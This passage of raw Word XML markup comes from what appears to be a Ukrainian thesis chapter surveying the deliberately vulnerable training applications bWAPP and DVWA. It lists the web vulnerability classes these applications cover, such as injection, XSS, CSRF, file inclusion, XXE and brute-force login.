          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>SSI</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4207">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4207">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4207">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4207">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4207">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4207">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4207">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4207">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>Header</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4207">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> і </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>SMTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> ін’єкції</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3733C46C" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00D84A48" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="225" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS), Cross-Site Tracing (XST) і Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58033F78" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00D84A48" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="225" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>Проблеми AJAX і веб-служб (jQuery/JSON/XML/SOAP/WSDL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA6CF70" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="005027FB" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Питання автентифікації, авторизації і сесій, вразливість вивантаження файлів і бекдорів</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D70C44C" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="005027FB" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Довільний доступ до файлів, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directory</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>traversals</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, локальне і віддалене впровадження файлів (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LFI</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RFI</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A274B76" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="005027FB" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Проблеми</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>конфігурації</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Man-in-the-Middle, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>файли</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> cross-domain policy</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>розкриття</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>інформації</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1086BC05" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00D84A48" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="225" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">XML </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>External Entity attacks (XXE) і Server Side Request Forgery</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE7D09A" w14:textId="1C58F4C2" w:rsidR="00CE1AA4" w:rsidRPr="00D84A48" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="225" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Parameter tampering, cookie і password reset poisoning. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>[3</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273A740C" w14:textId="48848602" w:rsidR="00CE1AA4" w:rsidRPr="00D84A48" w:rsidRDefault="00CE1AA4" w:rsidP="00484499">
      <w:pPr>
        <w:keepNext/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="225"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2338520F" wp14:editId="2C76115A">
            <wp:extent cx="5735320" cy="3225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5320" cy="3225800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0882AA82" w14:textId="7309265F" w:rsidR="00CE1AA4" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Рис 3.1 bWAPP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41120E50" w14:textId="77777777" w:rsidR="00484499" w:rsidRDefault="00484499" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D3EEE8" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00C0553F" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc516752160"/>
      <w:bookmarkStart w:id="119" w:name="_Toc30433153"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.2 Описання </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Damn Vulnerable Web Application</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (DVWA)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w14:paraId="3880FE2B" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00F86EBA" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A380D3" w14:textId="14CC7E40" w:rsidR="00CE1AA4" w:rsidRPr="005B4CE1" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Damn</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vulnerable</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Application</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (рис. 3.2) – це веб-додаток на </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, яке є вразливим. Його головна ціль допомогти професіоналам по безпеці протестувати їх навики і інструменти в легальному окруженні, допомогти веб-розробникам краще зрозуміти процес безпеки веб-додатків і допомогти студентам і вчителям в вивченні безпеки веб-додатків. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Мета DVWA попрактикуватися в деяких самих найпоширеніших веб вразливостях, с різними рівнями складності</w:t>
      </w:r>
      <w:r w:rsidR="005B4CE1" w:rsidRPr="005B4CE1">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005B4CE1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66920A3F" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00D84A48" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Вразливості в DVWA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA00CCC" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="005027FB" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Брут-форс: Брут-форс </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> форми сторінки входу: використовується для тестування інструментів по атаці на пароль методом грубої сили і показує небезпеку слабких паролів.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1617B5E5" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00D84A48" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
